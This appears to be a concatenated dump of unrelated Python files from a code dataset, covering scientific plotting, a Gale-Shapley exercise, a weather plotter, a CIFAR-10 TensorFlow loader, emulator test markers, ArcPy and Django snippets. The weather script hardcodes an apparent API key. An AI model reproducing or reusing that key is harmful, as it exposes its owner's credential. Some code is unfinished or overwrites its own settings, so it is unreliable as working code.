['solid', 'dashed']):\n X = gr.values[:, 0]/100\n Y = np.array([float(y)/100 for y in gr.columns[1:]])\n Z = gr.values[:, 1:]\n cs = ax[i].contour(*np.meshgrid(X, Y), Z, linestyles=style)\n cs.collections[0].set_label(label[dt])\n ax[i].set_ylabel('Distance (\\\\AA)')\n ax[i].legend(loc='lower left', ncol=1)\n ax[i].set_aspect(1.0)\n fig.savefig(f'{tool}_bond_bond.png')\n\n# Average bonds and angles:\ndef plot_bond_and_angle_averages():\n fig, ax = plt.subplots(2, 1, figsize=(3.37,4.6), sharex=True)\n fig.suptitle(f'Average bond lengths and angles')\n ax[-1].set_xlabel('Time step size (fs)')\n for i, type in enumerate(['bond', 'angle']):\n for tool in tools:\n df = pd.read_csv(f'{tool}/results/{type}_stats.csv')\n dt, mean = df['dt'], df['mean']\n if type == 'bond':\n mean /= 100\n ax[i].plot(dt, mean, marker='o', label=tool)\n ax[i].legend(loc='lower left', ncol=1)\n ax[0].set_xscale(dt_scaling)\n ax[0].set_ylabel('Bond length (\\\\AA)')\n ax[0].legend(loc='upper right', ncol=1, title='$r_0 = 1.012$ \\\\AA')\n ax[1].set_xscale(dt_scaling)\n ax[1].set_ylabel('Angle (\\\\textdegree)')\n ax[1].legend(loc='lower right', ncol=1, title='$\\\\theta_0 = 113.24$\\\\textdegree')\n fig.savefig('average_bonds_and_angles.png')\n\n# Properties:\ndef plot_properties():\n openmm = pd.read_csv('openmm/results/properties.csv')\n piny = pd.read_csv('piny/results/properties.csv')\n\n fig, ax = plt.subplots(2, 1, figsize=(3.37,4.6), sharex=True)\n fig.suptitle(f'Average Properties')\n ax[-1].set_xlabel('Time step size (fs)')\n\n Econv = 627.50921*4.184\n\n energy = ax[0]\n energy.set_xscale(dt_scaling)\n energy.set_ylabel('Potential Energy (kJ/mol)')\n # E_lrc = -63.2297879351536\n energy.plot(openmm['dt'], openmm['PotEng'], marker='o', label='openmm')\n energy.plot(piny['dt'], Econv*piny['Etotal'], marker='o', label='piny')\n energy.legend(loc='upper left', ncol=1)\n\n pressure = ax[1]\n pressure.set_xscale(dt_scaling)\n pressure.set_ylabel('Pressure (atm)')\n pressure.plot(openmm['dt'], openmm['Press'], marker='o', label='openmm')\n\n N = 512*3\n V = 24.653**3 # A³\n kB = 8.31451E-7 # Boltzmann constant in Da*A²/(fs²*K)\n Pconv = 1.6388244954E+8 # Da/(A*fs²) to atm\n T = 298.15 # K\n P = piny['Ptotal'] - Pconv*N*kB*(piny['Temp'] - T)/V\n pressure.plot(piny['dt'], P, marker='o', label='piny')\n pressure.legend(loc='upper left', ncol=1)\n\n fig.savefig('average_properties.png')\n\nall = ['0.5', '01', '03', '06', '09', '15', '30', '45', '90']\nplot_rdfs(all)\n# plot_bonds(all)\n# plot_angles(all)\n# plot_combined([('0.5', '90'), ('06', '90')])\n# plot_bond_bond([('0.5', '90'), ('06', '90')])\n# plot_bond_and_angle_averages()\n# plot_properties()\nplt.show()\n","sub_path":"phenol-in-water/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":6753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"80068846","text":"import os\nimport numpy\n\nclass Etudiant(object):\n def __init__(self, L):\n self.nom = L[0]\n self.master = L[1:]\n self.libre = True\n\n def __repr__(self):\n return \"Nom : {} \\n master : {} \\n libre : {} \\n\".format(self.nom, self.master,self.libre)\n\n def positionMaster(self, master):\n return self.master.index(master)\n\nclass Master(object):\n def __init__(self,L):\n self.nom = L[0]\n self.listPref = L[1:-1]\n self.capacite = L[-1]\n self.nombreEtudiant = 0\n\n def __repr__(self):\n return \"nom : {} \\n liste de preference {} \\n capacite {} \\n nombre d'etudiant {} \\n\".format(self.nom, self.listPref, self.capacite,self.nombreEtudiant)\n\n\ndef lectureFichier(s):\n os.chdir('fichier_test')\n monFichier = open(s, \"r\") # Ouverture en lecture. Indentation par rapport a la ligne d'avant (<-> bloc).\n contenu = monFichier.readlines() # Contenu contient une liste de chainces de caracteres, chaque chaine correspond a une ligne\n monFichier.close() #Fermeture du fichier\n contenu[0]=contenu[0].split() # ligne.split() renvoie une liste de toutes les chaines contenues dans la chaine ligne (separateur=espace)\n os.chdir('..')\n return contenu\n\ndef PrefEtu(fichier):\n s = lectureFichier('TestPrefEtu.txt')\n n = int(s[0][0])\n print(n)\n M = []\n for i in range(1,n+1):\n M.append(s[i].split())\n return M\n\ndef PrefSpe(fichier):\n s = lectureFichier('TestPrefSpe.txt')\n n = int(s[0][1])\n cap = s[1].split()\n M = []\n for i in range(2,n):\n l = s[i].split()\n l.append(cap[i-1])\n M.append(l)\n return M\n\ndef indexMaster(M,master):\n for i in M:\n print(i.nom)\n if i.nom == master:\n return i\n print(\"Master non trouve !\")\n return []\ndef GaleShapley(M1,M2):\n ListeEtudiant = []\n ListeMaster = []\n for i in M1:\n ListeEtudiant.append(Etudiant(i))\n print(ListeEtudiant)\n for i in M2:\n ListeMaster.append(Master(i))\n print(ListeMaster)\n \n etudiant_libre = ListeEtudiant\n while etudiant_libre != []:\n e = etudiant_libre[0]\n master = e.master[0]\n print(\"master de l'etudiant : \",master)\n l = indexMaster(ListeMaster,master)\n print(\"master :\")\n print(l)\n etudiant_libre = []\n \n \n \n\nif __name__ == \"__main__\":\n M1 = PrefEtu('TestPrefEtu.txt')\n M2 = PrefSpe('TestPrefSpe.txt')\n print(M1)\n print(M2)\n GaleShapley(M1,M2)\n","sub_path":"3I025/tme1.py","file_name":"tme1.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"401740914","text":"#!/usr/bin/env python\n#\n# File Name: plot_hourly.py\n# Author: Evan Pete Walsh\n# Contact: epwalsh@iastate.edu\n# Creation Date: 02-12-2015\n# Last Modified: Mon Dec 7 23:41:52 2015\n# =============================================================================\n\n'''Plot some weather conditions as time series.'''\n\nimport urllib2\nimport json\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nkeyID = \"e932b028cad0d3eb\"\n\nf = urllib2.urlopen('http://api.wunderground.com/api/' + keyID +\n '/hourly/q/IA/Ames.json')\njson_string = f.read()\nf.close()\nparsed_json = json.loads(json_string)\n\nhourly_json = parsed_json['hourly_forecast']\n\nhourly = {'time': [],\n 'temp_f': [],\n 'temp_c': [],\n 'temp_feel_f': [],\n 'temp_feel_c': [],\n 'pop': []}\n\nfor hour in hourly_json:\n hourly['time'].append(hour['FCTTIME']['civil'])\n hourly['temp_f'].append(float(hour['temp']['english']))\n hourly['temp_c'].append(float(hour['temp']['metric']))\n hourly['temp_feel_f'].append(float(hour['feelslike']['english']))\n hourly['temp_feel_c'].append(float(hour['feelslike']['metric']))\n hourly['pop'].append(float(hour['pop']))\n\nx_labs = [hourly['time'][i] if i % 2 == 0 else ''\n for i in range(len(hourly['time']))]\n\n\ndef fahrenheit2celsius(temp):\n \"\"\"\n Returns temperature in Celsius.\n \"\"\"\n return (5. / 9.) * (temp - 32)\n\ndf = pd.DataFrame(hourly)\n\n# Plot temp, feelslike, and pop and three stacked plots using DataFrame's\n# built-in plot method.\nplots = df.loc[:, ['temp_f', 'pop']].plot(\n subplots=True,\n title=\"Hourly Conditions\",\n figsize=(12, 10))\nplots[1].set_xticks(range(len(x_labs)))\nplots[1].set_xticklabels(x_labs)\n# Temperature plot\nplots[0].set_ylabel('Degrees (f)')\nplots[0].plot(df['temp_feel_f'], linestyle='dashed', label='Feels like',\n color='r')\nplots[0].legend().get_texts()[0].set_text('Temperature')\nplots[0].grid(b=True, which='major')\nplots[0].axhline(y=32, color=\"black\", linewidth=1.5)\nplot2 = plots[0].twinx()\ny1, y2 = plots[0].get_ylim()\nplot2.set_ylim(fahrenheit2celsius(y1), fahrenheit2celsius(y2))\nplot2.set_ylabel('Degrees (c)')\n# Pop plot\nplots[1].legend().get_texts()[0].set_text('Chance of Precipitation')\nplots[1].set_ylabel('%')\nplots[1].grid(b=True, which='major')\n\n# plt.savefig('fig1.jpg')\nplt.show()\n","sub_path":"Python/weatherAlert/plot_hourly.py","file_name":"plot_hourly.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"536263000","text":"import matplotlib.pyplot as plt\r\n\r\n''' this function computes classes of ages from the original dataset '''\r\ndef plot_balancing_original(ages): \r\n #ages = {} # {identity:{jpg:age}}\r\n classes = {}\r\n for id in list(ages.keys()):\r\n for age in ages[id].values():\r\n try:\r\n classes[age] += 1\r\n except:\r\n classes[age] = 1\r\n\r\n return classes\r\n\r\n''' this function computes classes of ages from the selected dataset'''\r\ndef plot_balancing_modified(ages, final_dict):\r\n #final_dict => {identity:[jpgs]}\r\n classes = {}\r\n for id in list(final_dict.keys()):\r\n for jpg in final_dict[id]:\r\n age = ages[id][jpg]\r\n try:\r\n classes[age] += 1\r\n except:\r\n classes[age] = 1\r\n\r\n return classes\r\n\r\n''' this function computes classes of ages from the training set after the split'''\r\ndef after_split_plot(splitted_dict_labels):\r\n # splitted_dict_labels = {} # {id:{\"train\":[ages]}}\r\n classes = {}\r\n for id in list(splitted_dict_labels.keys()):\r\n for age in list(splitted_dict_labels[id][\"train\"]):\r\n try:\r\n classes[age] += 1\r\n except:\r\n classes[age] = 1\r\n \r\n return classes\r\n\r\n''' this function plots the balancing of original, modified and splitted training set'''\r\ndef vs_plot(ages, final_dict, splitted_dict_labels):\r\n classes_orig = plot_balancing_original(ages)\r\n classes_mod = plot_balancing_modified(ages, final_dict)\r\n classes_splitted = after_split_plot(splitted_dict_labels)\r\n\r\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)\r\n fig.suptitle(\"CLASSES BALANCE (4 AGE GROUPS)\")\r\n fig.subplots_adjust(hspace=.4)\r\n ax1.bar (classes_orig.keys(), classes_orig.values())\r\n ax1.title.set_text(\"ORIGINAL TS\")\r\n ax1.set_xlabel(\"age classes\")\r\n ax1.set_ylabel(\"number of occurences\")\r\n ax2.bar (classes_mod.keys(), classes_mod.values())\r\n ax2.title.set_text(\"MODIFIED TS\")\r\n ax2.set_xlabel(\"age classes\")\r\n ax2.set_ylabel(\"number of occurences\")\r\n ax3.bar(classes_splitted.keys(), classes_splitted.values())\r\n ax3.title.set_text(\"SPLITTED TS\")\r\n ax3.set_xlabel(\"age classes\")\r\n ax3.set_ylabel(\"number of occurences\")\r\n ax4.axis('off')\r\n plt.show()","sub_path":"csv_preprocessing/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"365315225","text":"\n\"\"\"Routine for decoding the CIFAR-10 binary file format.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\n\n#import functions\n\n# Process images of this size. Note that this differs from the original CIFAR\n# image size of 32 x 32. If one alters this number, then the entire model\n# architecture will change and any model would need to be retrained.\n#INPUT_IMAGE_SIZE = 64\n#IMAGE_SIZE = 48\n##For STL-10\n#IMAGE_SIZE = 96\n#INPUT_IMAGE_SIZE = 96\n## For CIFAR-10 (because random 24x24 crops are the way to go)\nIMAGE_SIZE = 24\nINPUT_IMAGE_SIZE = 32\n\n# Global constants describing the CIFAR-10 data set.\nNUM_CLASSES = 10\n## For CIFAR-10 originals\n#NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 50000\n#NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 10000\n## This is the labelled stl-10 set that I prepared\n#NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 10410\n#NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 2590\n\nNUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 350000\nNUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 50000\n\n\ndef read_cifar10(filename_queue):\n \"\"\"Reads and parses examples from CIFAR10 data files.\n\n Recommendation: if you want N-way read parallelism, call this function\n N times. This will give you N independent Readers reading different\n files & positions within those files, which will give better mixing of\n examples.\n\n Args:\n filename_queue: A queue of strings with the filenames to read from.\n\n Returns:\n An object representing a single example, with the following fields:\n height: number of rows in the result (32)\n width: number of columns in the result (32)\n depth: number of color channels in the result (3)\n key: a scalar string Tensor describing the filename & record number\n for this example.\n label: an int32 Tensor with the label in the range 0..9.\n uint8image: a [height, width, depth] uint8 Tensor with the image data\n \"\"\"\n\n class CIFAR10Record(object):\n pass\n result = CIFAR10Record()\n\n # Dimensions of the images in the CIFAR-10 dataset.\n # See http://www.cs.toronto.edu/~kriz/cifar.html for a description of the input format.\n label_bytes = 1 # 2 for CIFAR-100\n result.height = INPUT_IMAGE_SIZE\n result.width = INPUT_IMAGE_SIZE\n result.depth = 3\n image_bytes = result.height * result.width * result.depth\n # Every record consists of a label followed by the image, with a\n # fixed number of bytes for each.\n record_bytes = label_bytes + image_bytes\n\n # Read a record, getting filenames from the filename_queue. No\n # header or footer in the CIFAR-10 format, so we leave header_bytes\n # and footer_bytes at their default of 0.\n reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)\n result.key, value = reader.read(filename_queue)\n\n #print(\"The value from reading: {} \\n\".format(value))\n\n # Convert from a string to a vector of uint8 that is record_bytes long.\n record_bytes = tf.decode_raw(value, tf.uint8)\n \n #print(record_bytes)\n\n # The first bytes represent the label, which we convert from uint8->int32.\n result.label = tf.cast(tf.slice(record_bytes, [0], [label_bytes]), tf.int32)\n\n # The STL labels run from 1-10 will this make a difference? Better to normalise just in case...\n #result.label = result.label - 1\n #print(\"Here is the label: {}, hooray!\".format(result.label))\n\n # The remaining bytes after the label represent the image, which we reshape\n # from [depth * height * width] to [depth, height, width].\n depth_major = tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]),\n [result.depth, result.height, result.width])\n # Convert from [depth, height, width] to [height, width, depth].\n result.uint8image = tf.transpose(depth_major, [1, 2, 0])\n\n return result\n\n\n\ndef _generate_image_and_label_batch(image, label, min_queue_examples,\n batch_size, shuffle):\n \"\"\"Construct a queued batch of images and labels.\n\n Args:\n image: 3-D Tensor of [height, width, 3] of type.float32.\n label: 1-D Tensor of type.int32\n min_queue_examples: int32, minimum number of samples to retain\n in the queue that provides of batches of examples.\n batch_size: Number of images per batch.\n shuffle: boolean indicating whether to use a shuffling queue.\n\n Returns:\n images: Images. 4D tensor of [batch_size, height, width, 3] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n # Create a queue that shuffles the examples, and then\n # read 'batch_size' images + labels from the example queue.\n num_preprocess_threads = 16\n if shuffle:\n images, label_batch = tf.train.shuffle_batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size,\n min_after_dequeue=min_queue_examples)\n else:\n images, label_batch = tf.train.batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size)\n\n # Display the training images in the visualizer.\n tf.image_summary('images', images)\n\n return images, tf.reshape(label_batch, [batch_size])\n\n\ndef distorted_inputs(data_dir, batch_size):\n \"\"\"Construct distorted input for CIFAR training using the Reader ops.\n\n Args:\n data_dir: Path to the CIFAR-10 data directory.\n batch_size: Number of images per batch.\n\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n # for CIFAR-10\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]\n # for MNIST\n filenames = [os.path.join(data_dir, 'train-images-idx3-ubyte.bin'),]\n # for STL-10\n filenames = [os.path.join(data_dir, 'train_X.bin'),]\n # for CIFAR-10_munge (which is my munged together dataset)\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 26)]\n\n\n for f in filenames:\n if not tf.gfile.Exists(f):\n raise ValueError('Failed to find file: ' + f)\n\n # Create a queue that produces the filenames to read.\n filename_queue = tf.train.string_input_producer(filenames)\n\n # Read examples from files in the filename queue.\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n\n # Image processing for training the network. Note the many random\n # distortions applied to the image.\n\n # Randomly crop a [height, width] section of the image.\n distorted_image = tf.random_crop(reshaped_image, [height, width, 3])\n\n # Randomly flip the image horizontally.\n distorted_image = tf.image.random_flip_left_right(distorted_image)\n\n # Because these operations are not commutative, consider randomizing\n # the order their operation.\n distorted_image = tf.image.random_brightness(distorted_image, max_delta=63)\n distorted_image = tf.image.random_contrast(distorted_image, lower=0.2, upper=1.8)\n\n # Subtract off the mean and divide by the variance of the pixels.\n float_image = tf.image.per_image_whitening(distorted_image)\n\n # Ensure that the random shuffling has good mixing properties.\n min_fraction_of_examples_in_queue = 0.4\n min_queue_examples = int(NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN * min_fraction_of_examples_in_queue)\n print ('Filling queue with %d images before starting to train. ' 'This will take a few minutes.' % min_queue_examples)\n\n # Generate a batch of images and labels by building up a queue of examples.\n return _generate_image_and_label_batch(float_image, read_input.label,\n min_queue_examples, batch_size,\n shuffle=True)\n\n\ndef distorted_inputs_noAugmentation(data_dir, batch_size):\n \"\"\"Construct distorted input for CIFAR training using the Reader ops.\n\n Args:\n data_dir: Path to the CIFAR-10 data directory.\n batch_size: Number of images per batch.\n\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]\n # for MNIST\n filenames = [os.path.join(data_dir, 'train-images-idx3-ubyte.bin'),]\n # for STL-10\n filenames = [os.path.join(data_dir, 'train_X.bin'),]\n\n for f in filenames:\n if not tf.gfile.Exists(f):\n raise ValueError('Failed to find file: ' + f)\n \n # Create a queue that produces the filenames to read.\n filename_queue = tf.train.string_input_producer(filenames)\n\n # Read examples from files in the filename queue.\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n\n #switch to using yuv\n #print(\"The shape: {}.\".format(tf.shape(reshaped_image)))\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n\n # Image processing for training the network. Note the many random\n # distortions applied to the image.\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n #Just a center crop in the first instance - to maximise reproducability...\n distorted_image = tf.image.resize_image_with_crop_or_pad(reshaped_image, width, height)\n #convert to rgb...\n #distorted_image = functions.planarYUV_2_planarRGB_areadyshaped(distorted_image)\n \n # Randomly crop a [height, width] section of the image.\n #distorted_image = tf.random_crop(reshaped_image, [height, width, 3])\n #print(tf.shape(distorted_image))\n\n # Randomly flip the image horizontally.\n #distorted_image = tf.image.random_flip_left_right(distorted_image)\n\n # Because these operations are not commutative, consider randomizing\n # the order their operation.\n # PAJ: Taking these out for now.\n #distorted_image = tf.image.random_brightness(distorted_image, max_delta=63)\n #distorted_image = tf.image.random_contrast(distorted_image, lower=0.2, upper=1.8)\n\n # Subtract off the mean and divide by the variance of the pixels.\n float_image = tf.image.per_image_whitening(distorted_image)\n\n # Ensure that the random shuffling has good mixing properties.\n min_fraction_of_examples_in_queue = 0.4\n min_queue_examples = int(NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN * min_fraction_of_examples_in_queue)\n print ('Filling queue with %d CIFAR images before starting to train. '\n 'This will take a few minutes.' % min_queue_examples)\n\n # Generate a batch of images and labels by building up a queue of examples.\n return _generate_image_and_label_batch(float_image, read_input.label,\n min_queue_examples, batch_size,\n shuffle=True)\n\n\ndef inputs(eval_data, data_dir, batch_size):\n \"\"\"Construct input for CIFAR evaluation using the Reader ops.\n\n Args:\n eval_data: bool, indicating if one should use the train or eval data set.\n data_dir: Path to the CIFAR-10 data directory.\n batch_size: Number of images per batch.\n\n Returns:\n images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.\n labels: Labels. 1D tensor of [batch_size] size.\n \"\"\"\n if not eval_data:\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]\n # for MNIST\n filenames = [os.path.join(data_dir, 'train-images-idx3-ubyte.bin'), ]\n # for STL-10\n filenames = [os.path.join(data_dir, 'train_X.bin'), ]\n num_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN\n\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i) for i in xrange(1, 6)]\n else:\n filenames = [os.path.join(data_dir, 'test_batch.bin')]\n #for MNIST\n filenames = [os.path.join(data_dir, 't10k-images-idx3-ubyte.bin')]\n # for STL-10\n filenames = [os.path.join(data_dir, 'test_X.bin'), ]\n num_examples_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_EVAL\n filenames = [os.path.join(data_dir, 'test_batch.bin')]\n\n for f in filenames:\n if not tf.gfile.Exists(f):\n raise ValueError('Failed to find file: ' + f)\n\n # Create a queue that produces the filenames to read.\n filename_queue = tf.train.string_input_producer(filenames)\n\n # Read examples from files in the filename queue.\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n\n height = IMAGE_SIZE\n width = IMAGE_SIZE\n\n # Image processing for evaluation.\n # Crop the central [height, width] of the image.\n resized_image = tf.image.resize_image_with_crop_or_pad(reshaped_image,\n width, height)\n\n #resized_image = functions.planarYUV_2_planarRGB_areadyshaped(resized_image)\n\n\n # Subtract off the mean and divide by the variance of the pixels.\n float_image = tf.image.per_image_whitening(resized_image)\n\n # Ensure that the random shuffling has good mixing properties.\n min_fraction_of_examples_in_queue = 0.4\n min_queue_examples = int(num_examples_per_epoch *\n min_fraction_of_examples_in_queue)\n\n # Generate a batch of images and labels by building up a queue of examples.\n return _generate_image_and_label_batch(float_image, read_input.label,\n min_queue_examples, batch_size,\n shuffle=False)\n","sub_path":"cifar10_input.py","file_name":"cifar10_input.py","file_ext":"py","file_size_in_byte":13369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"530842061","text":"import os\n\nimport pytest\n\nfrom ..emulators import EmulatorWrapper\n\nSELECTED_GENS = [\n gen.strip() for gen in os.environ.get(\"TREZOR_UPGRADE_TEST\", \"\").split(\",\") if gen\n]\n\nif SELECTED_GENS:\n # if any gens were selected via the environment variable, force enable all selected\n LEGACY_ENABLED = \"legacy\" in SELECTED_GENS\n CORE_ENABLED = \"core\" in SELECTED_GENS\n\nelse:\n # if no selection was provided, select those for which we have emulators\n try:\n EmulatorWrapper(\"legacy\")\n LEGACY_ENABLED = True\n except Exception:\n LEGACY_ENABLED = False\n\n try:\n EmulatorWrapper(\"core\")\n CORE_ENABLED = True\n except Exception:\n CORE_ENABLED = False\n\n\nlegacy_only = pytest.mark.skipif(\n not LEGACY_ENABLED, reason=\"This test requires legacy emulator\"\n)\n\ncore_only = pytest.mark.skipif(\n not CORE_ENABLED, reason=\"This test requires core emulator\"\n)\n","sub_path":"tests/upgrade_tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"595631572","text":"'''\n--------------------------\nAuthor: Rashaad Bhamjee\nDate: March 14, 2016\n--------------------------\nWalks through a directory and outputs a CSV of the ArcGIS readable files in it \n(feature classes, rasters, tables, textfiles, etc.)\n---------------------------------------------------------------------------------------------------\nHOW TO USE:\n\t1. Change workspace to the directory you want to analyze\n\t2. Change output to where you want the csv file to go\n---------------------------------------------------------------------------------------------------\n\nREVISIONS:\n\n---------------------------------------------------------------------------------------------------\n'''\n\nimport arcpy, csv, os\n\nworkspace = r\"C:\\Users\\BhamjeeR\\Documents\"\noutput = r\"C:\\Users\\BhamjeeR\\Documents\\FilesInDir_ArcGISfiles.csv\"\n\nwith open(output, 'wb') as csvfile:\n csvwriter = csv.writer(csvfile)\n for dirpath, dirnames, filenames in arcpy.da.Walk(workspace):\n for filename in filenames:\n desc = arcpy.Describe(os.path.join(dirpath, filename))\n csvwriter.writerow([desc.catalogPath, desc.name, desc.dataType])","sub_path":"FileDirAnalyzer_arcgisfiles.py","file_name":"FileDirAnalyzer_arcgisfiles.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"524619411","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 14 12:00:15 2019\r\n\r\nANN - first layer RelU or tanh, secon softmax. \r\nc\r\n\r\n@author: Kubus\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom util import getData, softmax, cost, cost2, y2indicator, error_rate, relu\r\nfrom sklearn.utils import shuffle\r\n\r\nclass ANN(object):\r\n def __init__(self,M):\r\n self.M = M\r\n \r\n def fit(self, X,Y, learning_rate=10e-06, reg=10e-1, epochs=10000, show_fig=False):\r\n X, Y = shuffle(X,Y)\r\n Xvalid, Yvalid = X[-1000:], Y[-1000:]\r\n Tvalid = y2indicator(Yvalid)\r\n X, Y = X[:-1000], Y[:-1000]\r\n N, D = X.shape\r\n K = len(set(Y))\r\n T = y2indicator(Y)\r\n \r\n self.W1 = np.random.randn(D, self.M) / np.sqrt(D+ self.M)\r\n self.b1 = np.zeros(self.M)\r\n self.W2 = np.random.randn(self.M, K) / np.sqrt(self.M + K)\r\n self.b2 = np.zeros(K)\r\n \r\n costs = []\r\n best_validation_error = 1\r\n for i in range(epochs):\r\n # forward propagation\r\n pY, Z = self.forward(X)\r\n \r\n #gradient descent step\r\n pY_T = pY - T\r\n self.W2 -= learning_rate*(Z.T.dot(pY_T) + reg*self.W2)\r\n self.b2 -= learning_rate*((pY_T.sum()) + reg*self.b2)\r\n \r\n # dZ = pY_T.dot(self.W2.T) * (Z > 0) # relu\r\n dZ = pY_T.dot(self.W2.T) * (1 - Z*Z) # tanh\r\n self.W1 -= learning_rate*(X.T.dot(dZ) + reg*self.W1)\r\n self.b1 -= learning_rate*(np.sum(dZ, axis=0) + reg*self.b1)\r\n \r\n if i % 10 == 0:\r\n pYvalid, _ = self.forward(Xvalid)\r\n c = cost(Tvalid, pYvalid)\r\n costs.append(c)\r\n e = error_rate(Yvalid, np.argmax(pYvalid, axis=1))\r\n print(\"i: \", i, \"cost: \", c, \"error: \", e)\r\n if e < best_validation_error:\r\n best_validation_error = e\r\n print(\"best validation error = \", best_validation_error)\r\n \r\n if show_fig:\r\n plt.plot(costs)\r\n plt.show()\r\n \r\n def forward(self, X):\r\n Z= np.tanh(X.dot(self.W1) + self.b1) # for tanh\r\n #Z = relu(X.dot(self.W1) + self.b1)\r\n return softmax(Z.dot(self.W2) + self.b2), Z\r\n \r\n def predict(self, X):\r\n pY, _ = self.forward(X)\r\n return np.argmax(pY, axis=1)\r\n\r\n def score(self, X, Y):\r\n prediction = self.predict(X)\r\n return 1 - error_rate(Y, prediction)\r\n\r\n\r\ndef main():\r\n X, Y = getData()\r\n \r\n model = ANN(100)\r\n model.fit(X,Y, show_fig=True)\r\n print(model.score(X,Y))\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"92103675","text":"from django import forms\n\nfrom workshops.models import Skill\n\nINSTRUCTOR_SEARCH_LEN = 10 # how many instrutors to return from a search by default\n\n\nclass InstructorMatchForm(forms.Form):\n '''Represent instructor matching form.'''\n\n wanted = forms.IntegerField(label='Number Wanted',\n initial=INSTRUCTOR_SEARCH_LEN,\n min_value=1)\n latitude = forms.FloatField(label='Latitude',\n min_value=-90.0,\n max_value=90.0)\n longitude = forms.FloatField(label='Longitude',\n min_value=-180.0,\n max_value=180.0)\n\n def __init__(self, *args, **kwargs):\n '''Build checkboxes for skills dynamically.'''\n super(InstructorMatchForm, self).__init__(*args, **kwargs)\n skills = Skill.objects.all()\n for s in skills:\n self.fields[s.name] = forms.BooleanField(label=s.name, required=False)\n","sub_path":"workshops/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"39720118","text":"import os\nimport json\nfrom pathlib import Path\n\nphotosList = os.listdir(\"./photos\")\nprint(photosList)\ndef getInput(text):\n print(text)\n output = input(\"> \")\n\nparentDir=Path(__file__).resolve().parent\n\nparentDir=f\"{parentDir}\".split(\"/\")\nparentDir=parentDir[-1]\nprint(parentDir)\nbaseJson={\n \"hero\":\"photos/hero.jpg\",\n \"title\":\"Whatever the title of this essay is.\",\n \"fontType\":\"serif\",\n \"brand\":{\n \"logo\":\"the 2020 daily recap\",\n \"href\":\"https://2020.darcylf.me\"\n },\n \"photos\":[]\n}\n\nfor i in photosList:\n if (i != \"hero.jpg\"):\n coolDict = {\n \"imageURL\":f\"photos/{i}\",\n \"caption\":\"edit me\"\n }\n\n \n baseJson[\"photos\"].append(coolDict)\ncoolDict = {\n \"imageURL\":f\"photos/hero.jpg\",\n \"caption\":\"edit me\"\n}\n\n \nbaseJson[\"photos\"].append(coolDict)\n\njsonFile = f\"{parentDir}.json\"\nprint(jsonFile)\n\nwith open(jsonFile, \"w\") as write_file:\n json_object = json.dumps(baseJson, indent = 4) \n write_file.write(json_object) 